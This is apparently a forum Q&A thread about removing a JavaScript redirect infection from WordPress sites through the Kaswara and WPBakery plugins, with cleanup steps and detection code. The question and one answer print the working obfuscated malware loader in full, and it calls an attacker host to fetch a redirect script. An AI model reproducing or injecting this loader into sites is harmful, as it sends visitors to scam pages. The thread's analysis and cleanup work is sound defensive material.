
Wordpress WPBakery and Kaswara security Vulnerability

I have come across the issue that one of the Wordpress websites I provide maintenance for would strangely redirect the user (unprotected by an AdBlocker) to scam websites.

The redirection has been done through stick.travelinskydream.ga.

On a closer check, a script with the following code has been automatically injected into the application. The following code was used:

var _0x230d=['getElementsByTagName','script','parentNode','279875vBeEEE','head','698448rkGfeF','679597pxmSpW','281314aeWSVS','1fashtG','currentScript','1439788dxeSnm','src','1051197hJyWzE','277011vIvjKc','2vRLkLk','fromCharCode','1YWwfcj'];var _0x3e5356=_0x567b;function _0x567b(_0x4f69c6,_0x44f06a){_0x4f69c6=_0x4f69c6-0x161;var _0x230d0d=_0x230d[_0x4f69c6];return _0x230d0d;}(function(_0x23c6e3,_0x4b8159){var _0x137209=_0x567b;while(!![]){try{var _0x388290=-parseInt(_0x137209(0x168))*parseInt(_0x137209(0x16a))+parseInt(_0x137209(0x16f))+-parseInt(_0x137209(0x165))*-parseInt(_0x137209(0x161))+-parseInt(_0x137209(0x16c))+parseInt(_0x137209(0x167))+parseInt(_0x137209(0x16e))+-parseInt(_0x137209(0x170))*-parseInt(_0x137209(0x169));if(_0x388290===_0x4b8159)break;else _0x23c6e3['push'](_0x23c6e3['shift']());}catch(_0x227ada){_0x23c6e3['push'](_0x23c6e3['shift']());}}}(_0x230d,0xb70ce));var mm=String[_0x3e5356(0x171)](0x68,0x74,0x74,0x70,0x73,0x3a,0x2f,0x2f,0x73,0x74,0x69,0x63,0x6b,0x2e,0x74,0x72,0x61,0x76,0x65,0x6c,0x69,0x6e,0x73,0x6b,0x79,0x64,0x72,0x65,0x61,0x6d,0x2e,0x67,0x61,0x2f,0x62,0x72,0x61,0x6e,0x64,0x2e,0x6a,0x73,0x26,0x76,0x3d,0x30,0x30,0x33,0x32,0x26,0x73,0x69,0x64,0x3d,0x32,0x33,0x36,0x26,0x70,0x69,0x64,0x3d,0x35,0x34,0x35,0x37,0x34,0x37),d=document,s=d['createElement'](_0x3e5356(0x163));s[_0x3e5356(0x16d)]=mm;document[_0x3e5356(0x16b)]?document[_0x3e5356(0x16b)][_0x3e5356(0x164)]['insertBefore'](s,document[_0x3e5356(0x16b)]):d[_0x3e5356(0x162)](_0x3e5356(0x166))[0x0]['appendChild'](s);

It creates a script tag that executes an external JS code which redirects the user to malicious websites when it loads. The resulting script looks like:

<script src="https://stick.travelinskydreams.ga?Brand.js?vid=0000&pidi=191817&id=53646"></script>

From what I've seen, this vulnerability exists within WpBakery and Kaswara plugins and is a known issue.

https://www.wordfence.com/blog/2020/10/episode-90-wpbakery-plugin-vulnerability-exposes-over-4-million-sites/

https://howtofix.guide/fake-jquery-migrate-plugin/

After deactivating and reactivating plugins one by one, the only two culprits remaining were js_composer (Wp Bakery) and Kaswara. I have tried updating these two plugins, but the "infection" remained, even though patches have been released for this issue.

Just found this option with a BASE64 encoded JS Script. Find and delete it.

Look for this entry in your WP_OPTIONS table.

What's happening here?

This malware is Javascript content which triggers the GET of the travelinski stuff, brand.js.

Its content is encoded in BASE64 to disrupt its detection by SH or a Select Query. When invoked into the screen it becomes an executable snippet.

It may appear under a different option_name, but the content itself must not change that much.

So anyone looking for this issue, here is the reason and the solution.

Reason

Plugins: WP-Bakery (JS Composer) and Kaswara Plugins are having this issue.

Solution

You need to remove one entry from your wp_options table.

  • First login to cPanel.
  • Go to PHPMYADMIN.
  • Select the database of your website (which has the issue).
  • Then go to the wp_options table.
  • As my friend Andre mentioned, the entry could be under a different wp_option_name.
  • You need to enter JS in the Filter Rows input field.
  • It will give you results; now look for an option_value that starts with: dmFyIF
  • Delete that entry, and you're all done.

The resolution was simple enough: after hours, inside the Wordpress Dashboard, in the Kaswara menu > custom code sections, the very code that has been presented in the question was there. After deleting it, everything returned to normal.

It is surely not the only way such malware can destroy work, so I am appending this link with other possible effects.

https://www.wordfence.com/blog/2021/04/psa-remove-kaswara-modern-wpbakery-page-builder-addons-plugin-immediately/

A potential workaround that worked for me was adding this custom script that would remove the malicious JS after it has loaded (temporary solution, does not remove the virus):

$('script').each(function(index, obj) {
    console.log(index, obj);

    // remove the external loader tag by its src
    if (obj.src === 'https://stick.travelinskydream.ga/brand.js&v=0032&sid=236&pid=545747') {
        $(this).remove();
        console.log($(this).text());
    }

    // remove the inline obfuscated script by exact text match
    if ($(this).text() === "var _0x230d=['getElementsByTagName','script','parentNode','279875vBeEEE','head','698448rkGfeF','679597pxmSpW','281314aeWSVS','1fashtG','currentScript','1439788dxeSnm','src','1051197hJyWzE','277011vIvjKc','2vRLkLk','fromCharCode','1YWwfcj'];var _0x3e5356=_0x567b;function _0x567b(_0x4f69c6,_0x44f06a){_0x4f69c6=_0x4f69c6-0x161;var _0x230d0d=_0x230d[_0x4f69c6];return _0x230d0d;}(function(_0x23c6e3,_0x4b8159){var _0x137209=_0x567b;while(!![]){try{var _0x388290=-parseInt(_0x137209(0x168))*parseInt(_0x137209(0x16a))+parseInt(_0x137209(0x16f))+-parseInt(_0x137209(0x165))*-parseInt(_0x137209(0x161))+-parseInt(_0x137209(0x16c))+parseInt(_0x137209(0x167))+parseInt(_0x137209(0x16e))+-parseInt(_0x137209(0x170))*-parseInt(_0x137209(0x169));if(_0x388290===_0x4b8159)break;else _0x23c6e3['push'](_0x23c6e3['shift']());}catch(_0x227ada){_0x23c6e3['push'](_0x23c6e3['shift']());}}}(_0x230d,0xb70ce));var mm=String[_0x3e5356(0x171)](0x68,0x74,0x74,0x70,0x73,0x3a,0x2f,0x2f,0x73,0x74,0x69,0x63,0x6b,0x2e,0x74,0x72,0x61,0x76,0x65,0x6c,0x69,0x6e,0x73,0x6b,0x79,0x64,0x72,0x65,0x61,0x6d,0x2e,0x67,0x61,0x2f,0x62,0x72,0x61,0x6e,0x64,0x2e,0x6a,0x73,0x26,0x76,0x3d,0x30,0x30,0x33,0x32,0x26,0x73,0x69,0x64,0x3d,0x32,0x33,0x36,0x26,0x70,0x69,0x64,0x3d,0x35,0x34,0x35,0x37,0x34,0x37),d=document,s=d['createElement'](_0x3e5356(0x163));s[_0x3e5356(0x16d)]=mm;document[_0x3e5356(0x16b)]?document[_0x3e5356(0x16b)][_0x3e5356(0x164)]['insertBefore'](s,document[_0x3e5356(0x16b)]):d[_0x3e5356(0x162)](_0x3e5356(0x166))[0x0]['appendChild'](s);") {
        $(this).remove();
    }
});

Here is the "beautified" malicious code of the injected JS, maybe it will help someone.

// string table; _0x567b(i) returns _0x230d[i - 0x161] (line copied from the question's sample)
var _0x230d = ['getElementsByTagName', 'script', 'parentNode', '279875vBeEEE', 'head', '698448rkGfeF', '679597pxmSpW', '281314aeWSVS', '1fashtG', 'currentScript', '1439788dxeSnm', 'src', '1051197hJyWzE', '277011vIvjKc', '2vRLkLk', 'fromCharCode', '1YWwfcj'];
var _0x3e5356 = _0x567b;

function _0x567b(_0x4f69c6, _0x44f06a) {
    _0x4f69c6 = _0x4f69c6 - 0x161;
    var _0x230d0d = _0x230d[_0x4f69c6];
    return _0x230d0d;
}
// rotates the string table until the checksum matches, so the indices used below line up
(function(_0x23c6e3, _0x4b8159) {
    var _0x137209 = _0x567b;
    while (!![]) {
        try {
            var _0x388290 = -parseInt(_0x137209(0x168)) * parseInt(_0x137209(0x16a)) + parseInt(_0x137209(0x16f)) + -parseInt(_0x137209(0x165)) * -parseInt(_0x137209(0x161)) + -parseInt(_0x137209(0x16c)) + parseInt(_0x137209(0x167)) + parseInt(_0x137209(0x16e)) + -parseInt(_0x137209(0x170)) * -parseInt(_0x137209(0x169));
            if (_0x388290 === _0x4b8159) break;
            else _0x23c6e3['push'](_0x23c6e3['shift']());
        } catch (_0x227ada) {
            _0x23c6e3['push'](_0x23c6e3['shift']());
        }
    }
}(_0x230d, 0xb70ce));
// builds the loader URL from character codes (String.fromCharCode) ...
var mm = String[_0x3e5356(0x171)](0x68, 0x74, 0x74, 0x70, 0x73, 0x3a, 0x2f, 0x2f, 0x73, 0x74, 0x69, 0x63, 0x6b, 0x2e, 0x74, 0x72, 0x61, 0x76, 0x65, 0x6c, 0x69, 0x6e, 0x73, 0x6b, 0x79, 0x64, 0x72, 0x65, 0x61, 0x6d, 0x2e, 0x67, 0x61, 0x2f, 0x62, 0x72, 0x61, 0x6e, 0x64, 0x2e, 0x6a, 0x73, 0x26, 0x76, 0x3d, 0x30, 0x30, 0x33, 0x32, 0x26, 0x73, 0x69, 0x64, 0x3d, 0x32, 0x33, 0x36, 0x26, 0x70, 0x69, 0x64, 0x3d, 0x35, 0x34, 0x35, 0x37, 0x34, 0x37),
    d = document,
    s = d['createElement'](_0x3e5356(0x163));
// ... and injects it as a <script src> next to the current script, or into <head>
s[_0x3e5356(0x16d)] = mm;
document[_0x3e5356(0x16b)] ? document[_0x3e5356(0x16b)][_0x3e5356(0x164)]['insertBefore'](s, document[_0x3e5356(0x16b)]) : d[_0x3e5356(0x162)](_0x3e5356(0x166))[0x0]['appendChild'](s);

If you find anything else or have been affected by this, please share your solutions!
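An added example (not code from any of the answers above) that puts the two analysis steps the thread describes into one offline script: it finds wp_options rows whose option_value is base64 wrapping JavaScript (the `dmFyIF` prefix is just base64 for `var _`) and rebuilds the string that a `fromCharCode` argument list hides, which is how the beautified sample above builds its loader URL. The rows are a constructed sample standing in for a `SELECT option_name, option_value FROM wp_options` dump; the option name is the one reported in a reply below and, as the first answer notes, it varies.

```python
import base64
import binascii
import re

# Argument list of eight or more hex char codes: the shape String.fromCharCode
# obfuscation leaves, even when the property name is fetched via a lookup table.
CHARCODE_CALL = re.compile(r"\(((?:0x[0-9a-fA-F]{1,2}\s*,\s*){8,}0x[0-9a-fA-F]{1,2})\)")

def decode_js_option(value: str):
    """Decoded text if value is base64 wrapping JavaScript, else None.
    The 'dmFyIF' prefix from the answer above is base64 for 'var _'."""
    try:
        text = base64.b64decode(value, validate=True).decode("utf-8")
    except (binascii.Error, UnicodeDecodeError, ValueError):
        return None
    return text if text.lstrip().startswith("var ") else None

def recover_charcode_strings(js: str) -> list:
    """Rebuild every hidden string from its hex char-code argument list."""
    out = []
    for group in CHARCODE_CALL.findall(js):
        codes = [int(tok, 16) for tok in re.findall(r"0x[0-9a-fA-F]+", group)]
        out.append("".join(chr(c) for c in codes))
    return out

def scan_options(rows):
    """rows: (option_name, option_value) pairs dumped from wp_options.
    Returns [(option_name, recovered strings)] for base64-wrapped scripts
    that hide strings or create DOM elements."""
    findings = []
    for name, value in rows:
        js = decode_js_option(value)
        if js is None:
            continue
        hidden = recover_charcode_strings(js)
        if hidden or "createElement" in js:
            findings.append((name, hidden))
    return findings

# Constructed sample rows: the loader URL quoted in the question, hidden as char
# codes the way the injected script does it, then base64-wrapped like the option.
_URL = "https://stick.travelinskydream.ga/brand.js&v=0032&sid=236&pid=545747"
_JS = ("var mm=String['fromCharCode'](" + ",".join(hex(ord(c)) for c in _URL)
       + "),s=document['createElement']('script');s['src']=mm;")
SAMPLE_ROWS = [
    ("siteurl", "https://example.test"),
    ("kasvaracustomjs", base64.b64encode(_JS.encode()).decode()),  # name as reported below
    ("blogdescription", "Just another site"),
]
```

Running `scan_options` over a real dump (e.g. rows exported from phpMyAdmin as CSV) lists the option names to delete and the URLs each hidden script would have loaded.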

After you clean your site, removing the extra js in kaswara, and perform a full scan with wordfence, then:

For every wordfence freemium user who tries to fix this issue before the 21st May, I suggest:

In wordfence-waf.php, put these lines just one line after the <?php tag:

if(!empty($_GET['action']) && $_GET['action'] == 'uploadFontIcon'){
   die('Good luck');
}

Then when you receive the wordfence update on 21st May, revert back to the original.

Thank you very much for this. I had my website infected with this and restored from backup, only to see it reinfected 2 weeks later. Found the db entry and also saw the script in the custom settings of kaswara. I'll see how best I can substitute what I used it for and then delete it.

Any idea how they got in? Is there an htaccess directive I can add to block them?

I found this report and went digging and found a p.php file uploaded 8 days ago in the kaswara icons folder /uploads/kaswara/icon/slt

https://wpscan.com/vulnerability/8d66e338-a88f-4610-8d12-43e8be2da8c5

After removing the kaswara plugin, go to mysql (maybe via phpmyadmin), find the wp_options table and delete the kasvaracustomjs option_name.
